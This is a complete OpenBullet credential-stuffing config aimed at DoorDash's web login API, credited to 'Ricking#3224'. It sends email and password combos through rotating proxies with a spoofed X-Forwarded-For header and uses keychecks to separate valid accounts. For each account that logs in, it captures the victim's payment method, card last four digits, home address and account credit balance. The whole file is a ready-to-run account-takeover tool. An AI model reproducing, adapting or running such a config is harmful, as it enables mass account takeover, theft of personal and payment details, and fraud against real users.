[SETTINGS]
{
  "Name": "DoorDashOBC",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-02-26T20:27:53.1379122+08:00",
  "AdditionalInfo": "Ricking#3224",
  "Author": "Ricking#3224",
  "Version": "1.1.0 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "Rotating Proxies work best. (Just click accept)",
      "VariableName": "",
      "Id": 1212327260
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://api.doordash.com/v2/auth/web_login/" 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "X-Forwarded-For: 222.144.90.139" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect username or password" 
  KEYCHAIN Success OR 
    KEY "last_name" 

PARSE "<SOURCE>" JSON "currency" CreateEmpty=FALSE -> CAP "Currency" 

PARSE "<SOURCE>" LR ",\"type\":\"" "\"" CreateEmpty=FALSE -> CAP "Payment Method" 

PARSE "<SOURCE>" JSON "last4" CreateEmpty=FALSE -> CAP "last4" 

PARSE "<SOURCE>" JSON "printable_address" CreateEmpty=FALSE -> CAP "Address" 

PARSE "<SOURCE>" LR "\"account_credits\":" "," -> VAR "AC" 

FUNCTION Compute "<AC>/100" -> VAR "ACC" 

PARSE "<ACC>" LR "" "" -> CAP "Balance" "$" "" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "\"account_credits\":0" 
  
